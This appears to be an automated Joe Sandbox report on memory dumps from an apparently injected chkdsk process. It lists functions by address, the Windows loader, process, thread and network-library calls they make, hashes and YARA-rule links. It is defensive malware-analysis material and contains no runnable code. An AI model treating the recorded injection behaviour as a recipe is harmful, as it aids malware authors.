Instruction ID: cdf3972888ddd8c98babda73a0f66516df5675bc9054de8feeae9658a2c3be89
Opcode Fuzzy Hash: 39c06992964a27d860058864231fa8d05fb18a400db3b0213522729f011fa0e1
Instruction Fuzzy Hash: A990023262541802D1547158445474600158BD0301F95C011A1024654D87D58B557AA1

Function 05232BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232BEA

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eb2beafacef9ef9f48aa280f831a1a2475a8a4f84bd17b81fc72c186299dda6b
Instruction ID: 2a86ab64671b2109148e8e65b54860465d3a0c6a28b1746752bdbbc709405d25
Opcode Fuzzy Hash: eb2beafacef9ef9f48aa280f831a1a2475a8a4f84bd17b81fc72c186299dda6b
Instruction Fuzzy Hash: 2590023222545842D14471584444A4600258BD0305F95C011A1064694D96A58E55BA61

Function 05232BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232BFA

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4c66ff83ac1155c6af6f1cb4f417bfab1b4b18359a43210677e3ab4768b770cb
Instruction ID: 4cb678d9ec68ef4cd23429a4d717ca088b60ecde58c7e2ffc2f5b9a6b49bc31c
Opcode Fuzzy Hash: 4c66ff83ac1155c6af6f1cb4f417bfab1b4b18359a43210677e3ab4768b770cb
Instruction Fuzzy Hash: 5990023222141802D1847158444464A00158BD1301FD5C015A1025654DCA958B597BA1

Function 05232AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232AFA

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 506b4cc6fd53c7130d5da471ff730fd3ff0217a6e54352a5dd2921fefc9e0de4
Instruction ID: a6f89bd905de1970ba23e22e4acc361e66dcd44668f3fc232aa5b0e6736f9ec3
Opcode Fuzzy Hash: 506b4cc6fd53c7130d5da471ff730fd3ff0217a6e54352a5dd2921fefc9e0de4
Instruction Fuzzy Hash: AF900226231410020149B558064450B04559BD63513D5C015F2416590CC6A189655721

Function 05232AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232ADA

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 46aaacf3e1f2b3f13b6e84c2402592c08df5daaa07c6ab6fbd3adf3e8fe1f71b
Instruction ID: a4e99d6bd9ff5596fe83cc84cc664f19cad89dc3ded3a0ff7c20b4581eee6d41
Opcode Fuzzy Hash: 46aaacf3e1f2b3f13b6e84c2402592c08df5daaa07c6ab6fbd3adf3e8fe1f71b
Instruction Fuzzy Hash: 63900226231410030109B558074450700568BD5351395C021F2015550CD6A189615521

Function 008101FF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(2E85-1J297,00000111,00000000,00000000), ref: 008102AD

Strings

2E85-1J297, xrefs: 008102B4, 008102B7
2E85-1J297, xrefs: 008102A0, 008102AC, 008102BD

Memory Dump Source

Source File: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_800000_chkdsk.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 2E85-1J297$2E85-1J297
API String ID: 1836367815-2292425170
Opcode ID: ea8dc3d9c3447559d540e6d901886e79264df6b1ffa234ff59c1ae421aebd605
Instruction ID: c643bbb65a2e1dd708339317d4ff000fbd84e732fc1eaec3667c061ab6c205ae
Opcode Fuzzy Hash: ea8dc3d9c3447559d540e6d901886e79264df6b1ffa234ff59c1ae421aebd605
Instruction Fuzzy Hash: 35110671D4025876EB11A6A49C03FDF7B7CEF81760F008255FA14BF1C1E6B4AA468BE6

Function 0081022A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(2E85-1J297,00000111,00000000,00000000), ref: 008102AD

Strings

2E85-1J297, xrefs: 008102B4, 008102B7
2E85-1J297, xrefs: 008102A0, 008102AC, 008102BD

Memory Dump Source

Source File: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_800000_chkdsk.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 2E85-1J297$2E85-1J297
API String ID: 1836367815-2292425170
Opcode ID: d47d530e30957930460fab38316295c075d586d169e600f9ad0bb35da11151a9
Instruction ID: b77dee78d35f34d63359766aa9a17ca40115bfba011e102071986cc435cf58c4
Opcode Fuzzy Hash: d47d530e30957930460fab38316295c075d586d169e600f9ad0bb35da11151a9
Instruction Fuzzy Hash: 2B11DB71D4135876EB21AAD49C02FDF7B7CEF41750F048055FA04BB181E6B496468BE6

Function 00810230 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(2E85-1J297,00000111,00000000,00000000), ref: 008102AD

Strings

2E85-1J297, xrefs: 008102B4, 008102B7
2E85-1J297, xrefs: 008102A0, 008102AC, 008102BD

Memory Dump Source

Source File: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_800000_chkdsk.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 2E85-1J297$2E85-1J297
API String ID: 1836367815-2292425170
Opcode ID: 3b1b99b9c13a98c7ba04de89d0eadab1f8c91b9564677e330a7a51c3aea08bc4
Instruction ID: 64ff41ff3160ecef7ecefa4c549b3327908c16595ef40b459a24713916061381
Opcode Fuzzy Hash: 3b1b99b9c13a98c7ba04de89d0eadab1f8c91b9564677e330a7a51c3aea08bc4
Instruction Fuzzy Hash: 70019671D4135876EB11AAA49C02FDF7B7CEF41B50F048065FA04BB181E6B466468BE6

Function 008222C0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 0082238B

Strings

net.dll, xrefs: 00822354, 008223DA, 008223B2, 008223BE, 008223E6
wininet.dll, xrefs: 0082232B, 00822337

Memory Dump Source

Source File: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_800000_chkdsk.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: f14d2edeb52da92eb45e75f659f22ecb2393974115eb49c601a2be59e287b20e
Instruction ID: b8cce6a1d37577f45dc7afc6312a3af233c3ad919b06817d098e2314e6f48b0c
Opcode Fuzzy Hash: f14d2edeb52da92eb45e75f659f22ecb2393974115eb49c601a2be59e287b20e
Instruction Fuzzy Hash: 6B31AFB1600714BBC714DF64D885FEBBBA8FF88300F004619FA599B241D374BA84CBA1

Function 0081E367 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0081E387

Strings

@J7<, xrefs: 0081E39B

Memory Dump Source

Source File: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_800000_chkdsk.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: @J7<
API String ID: 2538663250-2016760708
Opcode ID: ff12fda594aec73ca92d915bcb33bb9ce4d1c9d65c15240ca1ddb6ee378235be
Instruction ID: d880c87db1191bcf6d3a462f6693a0e9236c73831056b5e9c5f692794dee42aa
Opcode Fuzzy Hash: ff12fda594aec73ca92d915bcb33bb9ce4d1c9d65c15240ca1ddb6ee378235be
Instruction Fuzzy Hash: F4315075A0060AAFDB00DFD8D8809EFB7B9FF88304F108559E905EB214D771AE45CBA1

Function 0081E370 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0081E387

Strings

@J7<, xrefs: 0081E39B

Memory Dump Source

Source File: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_800000_chkdsk.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: @J7<
API String ID: 2538663250-2016760708
Opcode ID: 27cc4ac8af34ea21c69b4d0e7073fdd397a4a5683a00f57dd03264e858539acb
Instruction ID: 11936cdfe3c2ced1ee1365ef4433a2186c427cdd0deae6ba92aafcff4acbbc23
Opcode Fuzzy Hash: 27cc4ac8af34ea21c69b4d0e7073fdd397a4a5683a00f57dd03264e858539acb
Instruction Fuzzy Hash: 0E313EB5A0060A9FDB00DFD8D8809EEB3B9FF88304F108559E916EB204D771AE45CBA1

Function 00813BE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00813C52

Memory Dump Source

Source File: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_800000_chkdsk.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8e002775716ddafbd47eb7ae43edb81b7bd9865612dd9b2aa705ee0c60120a3d
Instruction ID: dfd6a9a4bef8bcac3086a26e8d221186d6aa8ad98a01a93279b378062a4e1b14
Opcode Fuzzy Hash: 8e002775716ddafbd47eb7ae43edb81b7bd9865612dd9b2aa705ee0c60120a3d
Instruction Fuzzy Hash: 1F010CB5E0020DABDF14DAA4EC46FDDB778EF54308F0045A5E919E7241F631EB988B92

Function 00827B00 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,?,?,?,008174A3,00000010,?,?,?,00000044,?,00000010,008174A3,?,?,?), ref: 00827B60

Memory Dump Source

Source File: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_800000_chkdsk.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: fba9c78066fb86d9f91f51c3de77d0f2a62298edbe6becbb889d3f07a3a84429
Instruction ID: 2402222b0e1bcbb70cf22633d74a7f3fef6878c7b98a36cd6a9d113857f9c93f
Opcode Fuzzy Hash: fba9c78066fb86d9f91f51c3de77d0f2a62298edbe6becbb889d3f07a3a84429
Instruction Fuzzy Hash: EE01D2B2204108BFCB44DE8DDC81EEB77ADEF8C714F408108BA09E3240DA30F8518BA9

Function 00817530 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 0081750C

Memory Dump Source

Source File: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_800000_chkdsk.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 0b15cb72b24f5e271675e8c2dc2b7ab85076c8575cf3a05a3f02fb29d32ac1da
Instruction ID: 2dac93e127c3aa24721a8a59ba8a4a5a2581bbc7643a3f47a30e7f255797a5cc
Opcode Fuzzy Hash: 0b15cb72b24f5e271675e8c2dc2b7ab85076c8575cf3a05a3f02fb29d32ac1da
Instruction Fuzzy Hash: 7AF04C2164869457DF2312388C127E63B2DAF03315F3C095CF586DB4C3E634D8964294

Function 008092C0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00809305

Memory Dump Source

Source File: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_800000_chkdsk.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: c07eec7fca1468d05d1c170caf4222add6f24925edd0f0dce4a231747551d0e5
Instruction ID: 868485328452068946a1370390a3f16eaea2778e05fb80bf68c198dcaf01eaa9
Opcode Fuzzy Hash: c07eec7fca1468d05d1c170caf4222add6f24925edd0f0dce4a231747551d0e5
Instruction Fuzzy Hash: 24F065733802143AE62065ADAC03FD7B69CEB84771F540426F70DEB1C1D591B44146A5

Function 008092B8 Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00809305

Memory Dump Source

Source File: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_800000_chkdsk.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 0e6facdd21fb09dacd1459298f00ccc7c7a0e5d5e8a0fbfedfd4b58723e37bba
Instruction ID: 980c64d8cf41624c1f90a84e6853ae5aee805aaa183dd767d5b36ca6648e7482
Opcode Fuzzy Hash: 0e6facdd21fb09dacd1459298f00ccc7c7a0e5d5e8a0fbfedfd4b58723e37bba
Instruction Fuzzy Hash: 25F09B722806543EE73062AC9C03FDB779DEF85760F640519F709EB2C2D592748286A5

Function 00827A20 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00810E49,?,00824209,00810E49,00823DC7,00824209,?,00810E49,00823DC7,00001000,?,?,008292F3), ref: 00827A5F

Memory Dump Source

Source File: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_800000_chkdsk.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c286dcae18159a84dbffeaf2fff31ae69f6c2988dca278fb47e8d07425d301a0
Instruction ID: 604241a6f236938b296d4e39d933cff5ce0f94910a67a9f409eefdde5e5ece33
Opcode Fuzzy Hash: c286dcae18159a84dbffeaf2fff31ae69f6c2988dca278fb47e8d07425d301a0
Instruction Fuzzy Hash: B1E06D71200604BFDA10EE58EC45FEB37ADEF84720F108409F908A7241CA30BD10CBB9

Function 00827A70 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,787DA667,00000007,00000000,00000004,00000000,008134C3,000000F4,?,?,?,?,?), ref: 00827AAF

Memory Dump Source

Source File: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_800000_chkdsk.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 6046a2a276af6c31bbf028b166cbe6262e2fbb1c8e018c6e84f56d1176c5d109
Instruction ID: 46f2f1c7a73cae96d60f495b031e85a608db59c011c5127e84a695a66deaa000
Opcode Fuzzy Hash: 6046a2a276af6c31bbf028b166cbe6262e2fbb1c8e018c6e84f56d1176c5d109
Instruction Fuzzy Hash: 2BE06D712002047FDA14EE58DC45F9B37ADEF89710F004408F908E7241DA70B81087B9

Function 008174E0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 0081750C

Memory Dump Source

Source File: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_800000_chkdsk.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 011410a5f2eb924cfff189fc5ba29a09c652b7c2c06128ec5833352805b48186
Instruction ID: a0c16de70f85361e09bd70101cab10a2f0fae22f5b82886f3eb63ac85ad852bb
Opcode Fuzzy Hash: 011410a5f2eb924cfff189fc5ba29a09c652b7c2c06128ec5833352805b48186
Instruction Fuzzy Hash: DDE086712443082BFB246AA8DC46FE6336DDF4C725F684A64F91DDB2C2E578F9819150

Function 008172E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00811130,008264E7,00823DC7,?), ref: 00817323

Memory Dump Source

Source File: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_800000_chkdsk.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 6324c3716770a43747702c452d78498f71c6a11b53caf19468caabd63fb3781a
Instruction ID: 939c7672c9f8b2291f3921191b7ac454e3f2fbf8e4f337b9e44c58df6010df28
Opcode Fuzzy Hash: 6324c3716770a43747702c452d78498f71c6a11b53caf19468caabd63fb3781a
Instruction Fuzzy Hash: F0E086716842443EFB10E2B89C47FE52F69EB84304F5440BCB449D72C3D851A5018665

Function 008172F0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00811130,008264E7,00823DC7,?), ref: 00817323

Memory Dump Source

Source File: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_800000_chkdsk.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 48fc90a61e18b2f1077fd252f05b303faf41566d1f6743137865446243a301f2
Instruction ID: eac9ed7c60ec83d183bf1a8a5c78b6ff2f1ec1939ab05e0e2b3fdd111150b33f
Opcode Fuzzy Hash: 48fc90a61e18b2f1077fd252f05b303faf41566d1f6743137865446243a301f2
Instruction Fuzzy Hash: 53D02EB13803083FFA00E2A8DC03F52368CEB00310F808078B90CE72C3E820F00045A6

Function 05232C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232C24

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1da3136e0d1bc11adf47541e3c3089230b59b0a9ea0655ec61c98326b3de72bb
Instruction ID: 47324ab27c78c5555b57896e2e4a6ce7ddfe3e21be942a6908cfc1f513792a09
Opcode Fuzzy Hash: 1da3136e0d1bc11adf47541e3c3089230b59b0a9ea0655ec61c98326b3de72bb
Instruction Fuzzy Hash: 3EB09B739115D5C5DB15F7604609B1779117FD0701F56C461D3070642F4778D1D1E575

Non-executed Functions

Function 05227630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05264655
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 052646FC
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05264742
CLIENT(ntdll): Processing section info %ws..., xrefs: 05264787
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05264725
Execute=1, xrefs: 05264713
ExecuteOptions, xrefs: 052646A0

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: faa68f7d9e38168bfb6922f244681b6d4c4f88b7dcd48a44ac8e729dee561031
Instruction ID: 9618c4151f1b693517502a8edc67407a771e225d5598a2aff000df6421533033
Opcode Fuzzy Hash: faa68f7d9e38168bfb6922f244681b6d4c4f88b7dcd48a44ac8e729dee561031
Instruction Fuzzy Hash: 8651197576822A7ADF11EBA4DC8EFB977A9FF04300F0800A9E509AB190DB709E45CF51

Function 0523B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0523B6BF

Strings

0, xrefs: 0523B66F
-, xrefs: 0523B650
+, xrefs: 0523B65A
0, xrefs: 0523B695

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: 469be294fc5489e948e640e0ddd14f98a53ec98146946d79ff786e06ff718ae6
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: 1D8191F1E2924A9ADF24CF68C8927FEBBB2FF45310F18415AD895A7291C77498418B50

Function 0521F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 052602BD
RTL: Re-Waiting, xrefs: 0526031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 052602E7

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: b58013d12c46e5b24eb5af69d2836e09ed3189125987c8ced10bcf8b204d66ed
Instruction ID: fdde31dfaf44939efce2195f5816c75587237c3f450e9d2f2856991ab68823b4
Opcode Fuzzy Hash: b58013d12c46e5b24eb5af69d2836e09ed3189125987c8ced10bcf8b204d66ed
Instruction Fuzzy Hash: 96E1C2706287429FD725CF28C988B2BB7E1BF94314F140A5DF8A98B2D0D774E885CB56

Function 0522B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0526728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05267294
RTL: Re-Waiting, xrefs: 052672C1
RTL: Resource at %p, xrefs: 052672A3

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: d74ec254e9c0afb2fb8579932bb48dcb0f4658400ebbab2d2bf259fa9cc168b2
Instruction ID: 925d04a1971d412abb586ccab666152ade8a5cb01be249acf8ccba1f7da54e11
Opcode Fuzzy Hash: d74ec254e9c0afb2fb8579932bb48dcb0f4658400ebbab2d2bf259fa9cc168b2
Instruction Fuzzy Hash: 79411F35724216ABC720DE24CC81F6AB7A6FF84714F140619FC59AB280DB31F882CBD0

Function 05237D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 05237E8B

Strings

-, xrefs: 05237DDD
+, xrefs: 05237DE8

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

